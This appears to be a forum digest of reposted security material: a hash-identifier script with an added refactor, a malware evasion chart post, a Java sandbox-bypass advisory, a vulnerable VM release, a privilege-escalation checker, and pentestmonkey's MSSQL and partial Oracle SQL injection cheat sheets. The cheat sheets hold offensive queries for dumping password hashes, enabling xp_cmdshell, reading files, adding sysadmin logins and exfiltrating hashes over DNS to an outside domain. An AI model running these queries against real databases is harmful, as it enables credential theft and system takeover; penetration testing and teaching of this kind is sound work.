    hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122020")

def SHA512HMAC():
    hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122060")

def Whirlpool():
    hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122040")

def WhirlpoolHMAC():
    hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122080")

print logo

# Main loop: every detector function appends its algorithm id to 'jerar'
# when the input string has the right length/charset/prefix; the ids are
# then sorted and resolved through the 'algorithms' dictionary.
while True:
    jerar=[]
    print """ -------------------------------------------------------------------------"""
    hash = raw_input(" HASH: ")

    ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16()
    GHash323(); GHash325(); GOSTR341194()
    Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC()
    LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC()
    MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2()
    MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x()
    RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC()
    SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2()
    SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass()
    SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC()
    SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC()
    Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC()
    Whirlpool(); WhirlpoolHMAC(); XOR32()
    # duplicate calls to md5saltmd5pass() and md5saltmd5passsalt() removed:
    # each call would have appended the same id to 'jerar' twice
    md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername()
    md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt()
    md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt()
    md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt()
    md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass()
    md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass()
    sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass()
    sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass()
    sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass()

    if len(jerar)==0:
        print ""
        print " Not Found."
    elif len(jerar)>2:
        jerar.sort()
        print ""
        print "Possible Hashs:"
        print "[+] ",algorithms[jerar[0]]
        print "[+] ",algorithms[jerar[1]]
        print ""
        print "Least Possible Hashs:"
        for a in range(int(len(jerar))-2):
            print "[+] ",algorithms[jerar[a+2]]
    else:
        jerar.sort()
        print ""
        print "Possible Hashs:"
        for a in range(len(jerar)):
            print "[+] ",algorithms[jerar[a]]
[/CODE]
Posted by Marco Ramilli at 3:39 AM Source: Marco Ramilli's Blog: Hash Detector Tool
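The same detector can be structured as one ordered table of shape patterns instead of one function per algorithm; the following is an added example, not Marco Ramilli's script, and its patterns, names and sample strings are this example's own assumptions. It also shows what the original's output hides: a 128-hex-digit string matches SHA-512, Whirlpool and both HMAC variants equally, and only a known plaintext (a test vector) can confirm an unsalted, unkeyed guess.

```python
import hashlib
import re
from typing import List, Tuple

# One ordered table of (name, shape pattern) replaces the per-algorithm
# functions and the numeric ids of the original script: earlier entries are
# the more common formats and are reported first. The patterns are this
# example's own assumptions about each format's shape, derived from the
# samples the original checks against (e.g. 'sha384$Zion3R$<96 hex>').
FORMATS: List[Tuple[str, "re.Pattern[str]"]] = [
    ("MD5",             re.compile(r"^[0-9a-fA-F]{32}$")),
    ("MD4",             re.compile(r"^[0-9a-fA-F]{32}$")),
    ("NTLM",            re.compile(r"^[0-9a-fA-F]{32}$")),
    ("MD5(Unix)",       re.compile(r"^\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")),
    ("MD5(APR)",        re.compile(r"^\$apr1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}$")),
    ("MD5(phpBB3)",     re.compile(r"^\$H\$[./0-9A-Za-z]{31}$")),
    ("MD5(Wordpress)",  re.compile(r"^\$P\$[./0-9A-Za-z]{31}$")),
    ("SHA-1",           re.compile(r"^[0-9a-fA-F]{40}$")),
    ("SHA-1(Django)",   re.compile(r"^sha1\$[^$]*\$[0-9a-fA-F]{40}$")),
    ("SHA-256",         re.compile(r"^[0-9a-fA-F]{64}$")),
    ("SHA-256(Django)", re.compile(r"^sha256\$[^$]*\$[0-9a-fA-F]{64}$")),
    ("SHA-384",         re.compile(r"^[0-9a-fA-F]{96}$")),
    ("SHA-384(Django)", re.compile(r"^sha384\$[^$]*\$[0-9a-fA-F]{96}$")),
    ("SHA-512(Unix)",   re.compile(r"^\$6\$(rounds=\d+\$)?[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}$")),
    ("SHA-512",         re.compile(r"^[0-9a-fA-F]{128}$")),
    ("Whirlpool",       re.compile(r"^[0-9a-fA-F]{128}$")),
    ("SHA-512(HMAC)",   re.compile(r"^[0-9a-fA-F]{128}$")),
    ("Whirlpool(HMAC)", re.compile(r"^[0-9a-fA-F]{128}$")),
]


def identify(candidate: str) -> List[str]:
    """Names of every format whose shape matches, most common first.

    Shape alone cannot separate SHA-512, Whirlpool and their HMAC variants:
    each is 128 hex digits, so all four are returned for such a string.
    """
    h = candidate.strip()
    return [name for name, pattern in FORMATS if pattern.match(h)]


def report(candidate: str) -> str:
    """Same output layout as the original: two 'Possible' guesses, the rest
    'Least Possible', or 'Not Found.' when no shape matches."""
    names = identify(candidate)
    if not names:
        return "Not Found."
    lines = ["Possible Hashs:"] + ["[+] " + n for n in names[:2]]
    if len(names) > 2:
        lines += ["Least Possible Hashs:"] + ["[+] " + n for n in names[2:]]
    return "\n".join(lines)


# Unsalted, unkeyed digests that hashlib can recompute. Salted (crypt, Django,
# phpass) and keyed (HMAC) formats cannot be confirmed from the digest alone.
HASHLIB_NAMES = {"MD5": "md5", "MD4": "md4", "SHA-1": "sha1", "SHA-256": "sha256",
                 "SHA-384": "sha384", "SHA-512": "sha512", "Whirlpool": "whirlpool"}


def confirm(plaintext: bytes, candidate: str) -> List[str]:
    """Narrow identify()'s guesses to the algorithms that actually reproduce the
    digest for a plaintext that is already known (e.g. a test vector)."""
    target = candidate.strip().lower()
    confirmed = []
    for name in identify(candidate):
        algo = HASHLIB_NAMES.get(name)
        if algo is None:
            continue
        try:
            digest = hashlib.new(algo, plaintext).hexdigest()
        except ValueError:
            # Algorithm not provided by the local OpenSSL build (md4 and
            # whirlpool are often missing); it cannot be ruled in or out.
            continue
        if digest == target:
            confirmed.append(name)
    return confirmed


# Constructed sample inputs (not from the original post).
SAMPLE_SHA512 = hashlib.sha512(b"correct horse").hexdigest()
SAMPLE_DJANGO_SHA384 = "sha384$Zion3R$" + hashlib.sha384(b"Zion3Rcorrect horse").hexdigest()
SAMPLE_CRYPT_SHA512 = "$6$saltsalt$" + "A" * 86   # right shape, not a real digest

if __name__ == "__main__":
    for sample in (SAMPLE_SHA512, SAMPLE_DJANGO_SHA384, SAMPLE_CRYPT_SHA512, "not a hash"):
        print(" HASH: " + sample)
        print(report(sample))
        print()
    print("confirmed for known plaintext:", confirm(b"correct horse", SAMPLE_SHA512))
```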
  2. [h=2]Malware Evasion Chart[/h] Plenty of documents describe how malware implements "escape" techniques in order to evade malware analysis. I did write posts on several of the most interesting evasion techniques (available here and here), adding information on my side as well. Today I want to share a personal MAP that I made to correlate evasion techniques to detection techniques. It helped me a lot during some of my past talks as well as during my (research) malware writing nights. The aim of the following MAP is to correlate evasion techniques to detection techniques without pretending to be "cool/graphically appealing" or "complete". It wants to be a "remind me what happens there".

[Figure: Malware Evasion Chart 101 (Download PDF)]

The "soul" of the entire chart is straight in the center. Highlighted in blue shape are the analysis techniques. Highlighted in red shape are the corresponding evasion techniques. In separate colored boxes are significant examples of evasion techniques (again, there are many many many other ways to perform debugging traps/Red Pills/etc./etc.; this wants to be only a "reminder"). A glimpse of content: all the detection techniques could be clustered into two big groups: "Static Analysis" and "Dynamic Analysis". The static analysis could be divided into "Signature" based techniques and "Decompiling" based techniques. The first set of techniques is based on signature matching. A signature is a set of bytes (not adjacent). The second set of techniques looks into binaries trying to understand behavior without running the binary on its own. These techniques are quite useful on pieces of data junk or non-executable data. On the other side is "dynamic analysis", where the analyst runs the malware. These techniques could be divided into "System Centric" and "Program Centric". The main difference between such techniques is the perspective. If you analyse the binary from inside you are "Program Centric" and so you might debug the binary and/or look for internal API calls. If you are analyzing the binary from outside you are "System Centric" and you probably are sandboxing the binary. In the example boxes you find significant pieces of code and/or software that are used to achieve the evasion technique. For instance in the green box named "Code not run" PEditor shows how to modify the OEP (Original Entry Point) of a program to run unaligned code. In the box named "Breaking/watching/Catching point handlers" one of the most famous signal handlers has been shown, and so forth and so on. If you find the MAP useful, please leave a comment; if you'd like to expand it please send me an email, I'd like to receive help in expanding it. Hope you'll enjoy. Source: Marco Ramilli's Blog: Malware Evasion Chart
  3. [sE-2012-01] New Reflection API affected by a known 10+ years old attack
From: Security Explorations <contact () security-explorations com>
Date: Thu, 18 Jul 2013 06:50:30 +0200

Hello All,

We discovered yet another indication that the new Reflection API introduced into Java SE 7 was not subject to a thorough security review (if any). A new vulnerability (Issue 69) that was submitted to Oracle today makes it possible to implement a very classic attack against Java VM. What's in particular interesting is that the attack itself has been in the public knowledge for at least 10+ years [1]. It's one of those risks one should protect against in the first place when new features are added to Java at the core VM level. The more surprising it is to discover that the Reflection API introduced to Java SE 7 didn’t implement proper protection against this attack.

Our Proof of Concept code for Issue 69 was confirmed to work with flying colors under Java SE 7 Update 25 (1.7.0_25-b16) and below. The code allows one to violate a fundamental feature of Java VM security - the safety of its type system. As a result, a complete and reliable Java security sandbox bypass can be gained on a vulnerable instance of Oracle's Java SE software.

Oracle's blog post published on May 30, 2013 [2] implies that maintaining the security-worthiness of Java has been Oracle’s priority following the acquisition of Sun Microsystems. Oracle's VP goes even further by indicating that "acquired product lines [such as Java SE] were required to conform to Oracle policies and procedures, including those comprising Oracle Software Security Assurance" [3]. If Oracle had any Software Security Assurance procedures adopted for Java SE, most of the simple Reflection API flaws along with a known, 10+ years old attack should have been eliminated prior to the Java SE 7 release. This didn't happen, thus it is reasonable to assume that Oracle's security policies and procedures are either not worth much or their implementation is far from perfect. That thought alone should catch the attention of Oracle customers not necessarily relying on Java SE, but rather on other Oracle products, which were likely subject to the very same, questionable Software Security Assurance policies and procedures as Java SE 7.

--

As for other things, we released technical details and Proof of Concept code for a previously reported security vulnerability (Issue 61) that got fixed by Oracle's Java SE CPU in Jun 2013:
http://www.security-explorations.com/materials/SE-2012-01-ORACLE-12.pdf
http://www.security-explorations.com/materials/se-2012-01-61.zip

We also released technical details and Proof of Concept codes for several (9 in total) IBM Java flaws that were addressed by the company in early Jul 2013:
http://www.security-explorations.com/materials/SE-2012-01-IBM-2.pdf
http://www.security-explorations.com/materials/se-2012-01-62-68.zip

The above includes details of trivially broken fixes for vulnerabilities reported to IBM in Sep 2012 (Issues 35-37 and 49). One of the issues is also a nice illustration of the "allowed behavior" (Issue 54) for other than Oracle's Java VM implementations.

Finally, we published information (and some comment) about CVE numbers assigned by Oracle to vulnerabilities reported by Security Explorations as part of the SE-2012-01 project:
http://www.security-explorations.com/materials/SE-2012-01-CVE_Map.pdf

Thank you.

Best Regards
Adam Gowdiak

---------------------------------------------
Security Explorations
Security Explorations
"We bring security research to the new level"
---------------------------------------------

References:
[1] Java and Java VM security vulnerabilities and their exploitation techniques, Last Stage of Delirium Research Group, Welcome to LSD-PLaNET
[2] Maintaining the security-worthiness of Java is Oracle’s priority, https://blogs.oracle.com/security/entry/maintaining_the_security_worthiness_of
[3] Oracle Software Security Assurance, Importance of Software Security Assurance

_______________________________________________
Full-Disclosure - We believe in it. Charter: [Full-Disclosure] Mailing List Charter. Hosted and sponsored by Secunia - Computer Security - Software & Alerts - Secunia

Source: Full Disclosure: [sE-2012-01] New Reflection API affected by a known 10+ years old attack
  4. Implementation and Evaluation of Datagram Transport Layer Security (DTLS) for the Android Operating System
Master's Degree Project, Stockholm, Sweden, June 2012

Abstract
Smartphones are nowadays a tool that everyone possesses. With the replacement of IPv4 with IPv6 it is possible to connect an extremely large number of electronic devices to the Internet. Those two factors are the premises to use smartphones to access those devices over a hybrid network, composed of Wireless Sensor Networks, the IPv6-based Internet of Things, constrained networks and the conventional Internet. Some of these networks are very lossy and use the UDP protocol, hence the most suitable protocol to access resources is CoAP, a connection-less variant of the HTTP protocol, standardized as the web protocol for the Internet of Things. The sensitivity of information and the Machine-to-Machine interaction as well as the presence of humans make End-to-End security one of the requirements of the IPv6 Internet of Things. Secure CoAP (CoAPS) provides security for the CoAP protocol in this context. In this thesis secure CoAP for Android smartphones is designed, implemented and evaluated, which is at the moment the first work that enables CoAPS for smartphones. All the cryptographic cipher suites proposed in the CoAP protocol, among which the pre-shared key and certificate-based authentications, are implemented, using Elliptic Curve Cryptography and the AES algorithm in CCM mode. The feasibility of this implementation is evaluated on a Nexus phone, which takes the handshake time in order to exchange parameters to secure the connection to about five seconds, and an increase from one to three seconds of the DTLS retransmission timer. Apart from these initial delays the performance using secure CoAP is comparable to the performance obtained using the same protocol without security. The implementation also allows securing the UDP transport thanks to the DTLS implementation, allowing any potential application to exchange secure data and have mutual authentication.

Download: http://t.co/BFQbAeNWn4
  5. Vulnerabilities in Full/Virtual Disk Encryption Products
Neil Kettle, neil/mu-b@digit-labs.org - digit-labs.org, neil@digit-security.com - Digit Security Ltd
SEC-T ’10

OUTLINE: AGENDA; FAQ; FAQ - Why Bother?; FAQ - Why Bother With Drivers?; Random Info; DISCLAIMER; PRODUCTS & VULNERABILITIES; Generic Driver Design; Products & Vulnerabilities; Vulnerability Matrix; CONCLUSIONS; REFERENCES

Download: http://www.digit-labs.org/files/presentations/sec-t-2010.pdf
  6. [h=2]Vulnix (Vulnerable Linux) Release 1.0[/h] Posted on September 10, 2012 by owen

Here we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!) The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows:

Architecture: x86
Format: VMware (vmx & vmdk) compatibility with version 4 onwards
RAM: 512MB
Network: NAT
Extracted size: 820MB
Compressed (download size): 194MB – 7zip format – 7zip can be obtained from here
MD5 Hash of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757

- Download Vulnix from HERE -

The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk. Feel free to contact me with any questions/comments using the comments section below. Enjoy!

Source: Vulnix (Vulnerable Linux) Release 1.0 - Rebootuser
Solutions: Vulnix (release 1.0) Solutions - Rebootuser
  7. [h=1]windows-privesc-check[/h] A long time ago, I started writing a tool to look for local privilege escalation vectors on Windows systems – e.g. weak permissions on files, directories, service registry keys. I never quite got round to finishing it, but the project could still be useful to pentesters and auditors in its current part-finished state. I’d suggest giving it a try next time you do a security audit with local administrator rights, or next time you get a non-admin logon to a Windows system during a pentest. It was designed to be useful for both.

Trunk contains the best all-round version. It checks some file, directory, registry and service permissions (among other things). Reports are in HTML. The newer wpc-2.0 branch does a better job at auditing Windows services – but does little else. Reports are in text only.

You only need to download the .exe file. Full source code is available too, though. It’s written in Python, uses pywin32 and “compiled” with pyinstaller. You don’t need to download any dependencies (even python) unless you’re planning to build the .exe yourself.

[h=2]FAQ[/h]
[h=3]Why 2 versions?[/h] The code in “trunk” wasn’t object-oriented, making it harder to work with. I rewrote it to create the “wpc-2.0” branch. Much better – but alas, not finished.
[h=3]Can I see the source code?[/h] Yes, it’s on google code along with the executables.
[h=3]Will the program elevate privileges for me?[/h] No. It gives you a report describing any potential vulnerabilities it finds, but doesn’t have any autopwn features. This is mostly to reduce the risk of my code accidentally breaking your client’s system.

Source: windows-privesc-check | pentestmonkey
  8. [h=1]MSSQL Injection Cheat Sheet[/h] Some useful syntax reminders for SQL Injection into MSSQL databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “-- priv” at the end of the query.

[TABLE]
[TR] [TD]Version[/TD] [TD]SELECT @@version[/TD] [/TR]
[TR] [TD]Comments[/TD] [TD]SELECT 1 -- comment
SELECT /*comment*/1[/TD] [/TR]
[TR] [TD]Current User[/TD] [TD]SELECT user_name();
SELECT system_user;
SELECT user;
SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID[/TD] [/TR]
[TR] [TD]List Users[/TD] [TD]SELECT name FROM master..syslogins[/TD] [/TR]
[TR] [TD]List Password Hashes[/TD] [TD]SELECT name, password FROM master..sysxlogins -- priv, mssql 2000;
SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins -- priv, mssql 2000. Need to convert to hex to return hashes in MSSQL error message / some version of query analyzer.
SELECT name, password_hash FROM master.sys.sql_logins -- priv, mssql 2005;
SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins -- priv, mssql 2005[/TD] [/TR]
[TR] [TD]Password Cracker[/TD] [TD]MSSQL 2000 and 2005 Hashes are both SHA1-based. phrasen|drescher can crack these.[/TD] [/TR]
[TR] [TD]List Privileges[/TD] [TD]-- current privs on a particular object in 2005, 2008
SELECT permission_name FROM master..fn_my_permissions(null, 'DATABASE'); -- current database
SELECT permission_name FROM master..fn_my_permissions(null, 'SERVER'); -- current server
SELECT permission_name FROM master..fn_my_permissions('master..syslogins', 'OBJECT'); -- permissions on a table
SELECT permission_name FROM master..fn_my_permissions('sa', 'USER'); -- permissions on a user
-- current privs in 2005, 2008
SELECT is_srvrolemember('sysadmin');
SELECT is_srvrolemember('dbcreator');
SELECT is_srvrolemember('bulkadmin');
SELECT is_srvrolemember('diskadmin');
SELECT is_srvrolemember('processadmin');
SELECT is_srvrolemember('serveradmin');
SELECT is_srvrolemember('setupadmin');
SELECT is_srvrolemember('securityadmin');
-- who has a particular priv? 2005, 2008
SELECT name FROM master..syslogins WHERE denylogin = 0;
SELECT name FROM master..syslogins WHERE hasaccess = 1;
SELECT name FROM master..syslogins WHERE isntname = 0;
SELECT name FROM master..syslogins WHERE isntgroup = 0;
SELECT name FROM master..syslogins WHERE sysadmin = 1;
SELECT name FROM master..syslogins WHERE securityadmin = 1;
SELECT name FROM master..syslogins WHERE serveradmin = 1;
SELECT name FROM master..syslogins WHERE setupadmin = 1;
SELECT name FROM master..syslogins WHERE processadmin = 1;
SELECT name FROM master..syslogins WHERE diskadmin = 1;
SELECT name FROM master..syslogins WHERE dbcreator = 1;
SELECT name FROM master..syslogins WHERE bulkadmin = 1;[/TD] [/TR]
[TR] [TD]List DBA Accounts[/TD] [TD]SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin? returns 1 for true, 0 for false, NULL for invalid role. Also try 'bulkadmin', 'systemadmin' and other values from the documentation
SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin? returns 1 for true, 0 for false, NULL for invalid role/username.
SELECT name FROM master..syslogins WHERE sysadmin = '1' -- tested on 2005[/TD] [/TR]
[TR] [TD]Current Database[/TD] [TD]SELECT DB_NAME()[/TD] [/TR]
[TR] [TD]List Databases[/TD] [TD]SELECT name FROM master..sysdatabases;
SELECT DB_NAME(N); -- for N = 0, 1, 2, …[/TD] [/TR]
[TR] [TD]List Columns[/TD] [TD]SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable'); -- for the current DB only
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable[/TD] [/TR]
[TR] [TD]List Tables[/TD] [TD]SELECT name FROM master..sysobjects WHERE xtype = 'U'; -- use xtype = 'V' for views
SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';
SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM master..syscolumns, master..sysobjects WHERE master..syscolumns.id=master..sysobjects.id AND master..sysobjects.name='sometable'; -- list column names and types for master..sometable[/TD] [/TR]
[TR] [TD]Find Tables From Column Name[/TD] [TD]-- NB: This example works only for the current database. If you want to search another db, you need to specify the db name (e.g. replace sysobject with mydb..sysobjects).
SELECT sysobjects.name as tablename, syscolumns.name as columnname FROM sysobjects JOIN syscolumns ON sysobjects.id = syscolumns.id WHERE sysobjects.xtype = 'U' AND syscolumns.name LIKE '%PASSWORD%' -- this lists table, column for each column containing the word 'password'[/TD] [/TR]
[TR] [TD]Select Nth Row[/TD] [TD]SELECT TOP 1 name FROM (SELECT TOP 9 name FROM master..syslogins ORDER BY name ASC) sq ORDER BY name DESC -- gets 9th row[/TD] [/TR]
[TR] [TD]Select Nth Char[/TD] [TD]SELECT substring('abcd', 3, 1) -- returns c[/TD] [/TR]
[TR] [TD]Bitwise AND[/TD] [TD]SELECT 6 & 2 -- returns 2
SELECT 6 & 1 -- returns 0[/TD] [/TR]
[TR] [TD]ASCII Value -> Char[/TD] [TD]SELECT char(0x41) -- returns A[/TD] [/TR]
[TR] [TD]Char -> ASCII Value[/TD] [TD]SELECT ascii('A') -- returns 65[/TD] [/TR]
[TR] [TD]Casting[/TD] [TD]SELECT CAST('1' as int);
SELECT CAST(1 as char)[/TD] [/TR]
[TR] [TD]String Concatenation[/TD] [TD]SELECT 'A' + 'B' -- returns AB[/TD] [/TR]
[TR] [TD]If Statement[/TD] [TD]IF (1=1) SELECT 1 ELSE SELECT 2 -- returns 1[/TD] [/TR]
[TR] [TD]Case Statement[/TD] [TD]SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END -- returns 1[/TD] [/TR]
[TR] [TD]Avoiding Quotes[/TD] [TD]SELECT char(65)+char(66) -- returns AB[/TD] [/TR]
[TR] [TD]Time Delay[/TD] [TD]WAITFOR DELAY '0:0:5' -- pause for 5 seconds[/TD] [/TR]
[TR] [TD]Make DNS Requests[/TD] [TD]declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\' + @host + 'c$boot.ini'''); -- nonpriv, works on 2000
declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\' + @host + 'c$boot.ini'''); -- priv, works on 2005
-- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
-- Also check out the DNS tunnel feature of sqlninja[/TD] [/TR]
[TR] [TD]Command Execution[/TD] [TD]EXEC xp_cmdshell 'net user'; -- priv
On MSSQL 2005 you may need to reactivate xp_cmdshell first as it’s disabled by default:
EXEC sp_configure 'show advanced options', 1; -- priv
RECONFIGURE; -- priv
EXEC sp_configure 'xp_cmdshell', 1; -- priv
RECONFIGURE; -- priv[/TD] [/TR]
[TR] [TD]Local File Access[/TD] [TD]CREATE TABLE mydata (line varchar(8000));
BULK INSERT mydata FROM 'c:boot.ini';
DROP TABLE mydata;[/TD] [/TR]
[TR] [TD]Hostname, IP Address[/TD] [TD]SELECT HOST_NAME()[/TD] [/TR]
[TR] [TD]Create Users[/TD] [TD]EXEC sp_addlogin 'user', 'pass'; -- priv[/TD] [/TR]
[TR] [TD]Drop Users[/TD] [TD]EXEC sp_droplogin 'user'; -- priv[/TD] [/TR]
[TR] [TD]Make User DBA[/TD] [TD]EXEC master.dbo.sp_addsrvrolemember 'user', 'sysadmin'; -- priv[/TD] [/TR]
[TR] [TD]Location of DB files[/TD] [TD]EXEC sp_helpdb master; -- location of master.mdf
EXEC sp_helpdb pubs; -- location of pubs.mdf[/TD] [/TR]
[TR] [TD]Default/System Databases[/TD] [TD]northwind
model
msdb
pubs -- not on sql server 2005
tempdb[/TD] [/TR]
[/TABLE]

[h=3]Misc Tips[/h] In no particular order, here are some suggestions from pentestmonkey readers.

From Dan Crowley: A way to extract data via SQLi with a MySQL backend

From Jeremy Bae: Tip about sp_helpdb – included in table above.

From Trip: List DBAs (included in table above now):
[INDENT]select name from master..syslogins where sysadmin = '1'[/INDENT]

From Daniele Costa: Tips on using fn_my_permissions in 2005, 2008 – included in table above. Also: To check permissions on multiple databases you will have to use the following pattern.
[INDENT]USE [DBNAME]; select permission_name FROM fn_my_permissions (NULL, 'DATABASE')[/INDENT]
Note also that in case of using this data with a UNION query a collation error could occur. In this case a simple trick is to use the following syntax:
[INDENT]select permission_name collate database_default FROM fn_my_permissions (NULL, 'DATABASE')[/INDENT]

Source: MSSQL Injection Cheat Sheet | pentestmonkey
  9. [h=1]Oracle SQL Injection Cheat Sheet[/h] Some useful syntax reminders for SQL Injection into Oracle databases… This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endeavoured to tabulate the data to make it easier to read and to use the same table for each database backend. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. The complete list of SQL Injection Cheat Sheets I’m working on is: Oracle, MSSQL, MySQL, PostgreSQL, Ingres, DB2, Informix. I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here. Some of the queries in the table below can only be run by an admin. These are marked with “-- priv” at the end of the query.

[TABLE]
[TR] [TD]Version[/TD] [TD]SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;[/TD] [/TR]
[TR] [TD]Comments[/TD] [TD]SELECT 1 FROM dual -- comment
-- NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name 'dual' when we’re not actually selecting from a table.[/TD] [/TR]
[TR] [TD]Current User[/TD] [TD]SELECT user FROM dual[/TD] [/TR]
[TR] [TD]List Users[/TD] [TD]SELECT username FROM all_users ORDER BY username;
SELECT name FROM sys.user$; -- priv[/TD] [/TR]
[TR] [TD]List Password Hashes[/TD] [TD]SELECT name, password, astatus FROM sys.user$ -- priv, <= 10g. astatus tells you if acct is locked
SELECT name,spare4 FROM sys.user$ -- priv, 11g[/TD] [/TR]
[TR] [TD]Password Cracker[/TD] [TD]checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10.[/TD] [/TR]
[TR] [TD]List Privileges[/TD] [TD]SELECT * FROM session_privs; -- current privs
SELECT * FROM dba_sys_privs WHERE grantee = 'DBSNMP'; -- priv, list a user's privs
SELECT grantee FROM dba_sys_privs WHERE privilege = 'SELECT ANY DICTIONARY'; -- priv, find users with a particular priv
SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS;[/TD] [/TR]
[TR] [TD]List DBA Accounts[/TD] [TD]SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = 'YES'; -- priv, list DBAs, DBA roles[/TD] [/TR]
[TR] [TD]Current Database[/TD] [TD]SELECT global_name FROM global_name;
SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT SYS.DATABASE_NAME FROM DUAL;[/TD] [/TR]
[TR] [TD]List Databases[/TD] [TD]SELECT DISTINCT owner FROM all_tables; -- list schemas (one per user)
-- Also query TNS listener for other databases. See tnscmd (services | status).[/TD] [/TR]
[TR] [TD]List Columns[/TD] [TD]SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';[/TD] [/TR]
[TR] [TD]List Tables[/TD] [TD]SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;[/TD] [/TR]
[TR] [TD]Find Tables From Column Name[/TD] [TD]SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%'; -- NB: table names are upper case[/TD] [/TR]
